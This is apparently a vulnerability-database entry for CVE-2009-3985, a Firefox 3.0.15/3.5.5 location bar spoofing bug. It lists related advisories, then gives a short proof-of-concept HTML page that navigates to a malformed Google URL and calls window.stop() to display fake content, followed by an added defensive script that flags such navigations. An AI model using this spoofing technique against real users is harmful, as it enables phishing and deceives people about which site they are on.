Mozilla Firefox Location Bar Spoofing Vulnerability in Version 3.0.15 & 3.5.
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
exploitpack | Mozilla Firefox - Location Bar Spoofing | 18 Dec 2009 00:00 | - | exploitpack |
0day.today | Mozilla Firefox Location Bar Spoofing Vulnerability | 18 Dec 2009 00:00 | - | zdt |
Veracode | Spoofed Content Association | 10 Apr 2020 00:41 | - | veracode |
seebug.org | Firefox content injection web page spoofing vulnerability | 18 Dec 2009 00:00 | - | seebug |
seebug.org | Mozilla Firefox Location Bar Spoofing Vulnerability | 18 Dec 2009 00:00 | - | seebug |
UbuntuCve | CVE-2009-3985 | 15 Dec 2009 00:00 | - | ubuntucve |
securityvulns | Mozilla Foundation Security Advisory 2009-69 | 17 Dec 2009 00:00 | - | securityvulns |
securityvulns | Mozilla Firefox multiple security vulnerabilities | 17 Dec 2009 00:00 | - | securityvulns |
Exploit DB | Mozilla Firefox - Location Bar Spoofing | 18 Dec 2009 00:00 | - | exploitdb |
Cvelist | CVE-2009-3985 | 17 Dec 2009 17:00 | - | cvelist |
```html
<!-----------------------------------------------------------------
Exploit Title: MOZILLA FIREFOX LOCATION BAR SPOOFING VULNERABILITY
Date: 2009-12-18
Author: Jordi Chancel
Software Link: http://www.mozilla.org/security/announce/2009/mfsa2009-69.html
Version: Mozilla Firefox 3.0.15 & 3.5.5
Tested on: Windows XP-VISTA-SEVEN & LINUX BACKTRACK
CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3985
DESCRIPTION: {
Security researcher Jordi Chancel reported an issue similar to one fixed in mfsa2009-44
in which a web page can set document.location to a URL that can't be displayed properly and then inject
content into the resulting blank page. An attacker could use this vulnerability to place a legitimate-looking
but invalid URL in the location bar and inject HTML and JavaScript into the body of the
page, resulting in a spoofing attack. }
Code :
------------------------------------------------------------------------>
<html>
<title>FAKE PAGE</title>
<body onload="javascript:window.location = 'https://www.google.com%20';window.stop();void(0);">
<title>FAKE PAGE</title>
<h1>FAKE PAGE</h1>
</body>
</html>
```
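A defensive check for the pattern the description covers, added here as an example and not part of the original advisory or of Mozilla's fix: it scans page source for script navigations whose target the WHATWG URL parser rejects, and records whether `window.stop()` follows. The names `NAV_ASSIGN`, `hostProblem` and `auditNavigations` and the sample markup are constructed for illustration.

```javascript
// Added example: flag script-driven navigations to absolute URLs whose host
// cannot be parsed, i.e. "a URL that can't be displayed properly".
// All names below are hypothetical; the sample input is constructed.

// Matches window.location = '...', document.location = "...", location.href = '...'
const NAV_ASSIGN =
  /\b(?:(?:window|document|self|top)\.)?location(?:\.href)?\s*=\s*(['"])(.*?)\1/g;

// Returns null when the target is acceptable, otherwise a short reason string.
function hostProblem(target) {
  try {
    new URL(target); // WHATWG parser: throws on an invalid host
    return null;
  } catch (_) {
    // Relative targets also throw without a base URL; they are not the concern here.
    if (!/^https?:\/\//i.test(target)) return null;
    const authority = target.replace(/^https?:\/\//i, '').split(/[\/?#]/)[0];
    const enc = authority.match(/%[0-9a-f]{2}/i);
    return enc ? `percent-encoded byte ${enc[0]} in host` : 'host rejected by URL parser';
  }
}

function auditNavigations(html) {
  const findings = [];
  for (const m of html.matchAll(NAV_ASSIGN)) {
    const reason = hostProblem(m[2]);
    if (!reason) continue;
    // A window.stop() right after the assignment aborts the load, so the
    // current document stays rendered under the new location bar text.
    const end = m.index + m[0].length;
    const tail = html.slice(end, end + 200);
    findings.push({
      target: m[2],
      reason,
      stopsLoad: /\bwindow\.stop\s*\(\s*\)/.test(tail),
    });
  }
  return findings;
}

// Constructed sample: one ordinary navigation, one in the advisory's shape.
const SAMPLE = `
<body onload="window.location = 'https://www.example.com/login';">
<body onload="window.location = 'https://www.example.com%20';window.stop();">
`;
console.log(auditNavigations(SAMPLE));
```

A percent-encoded byte that decodes to a valid host character (for example `%61`) parses cleanly and is not flagged; only targets the parser refuses are reported.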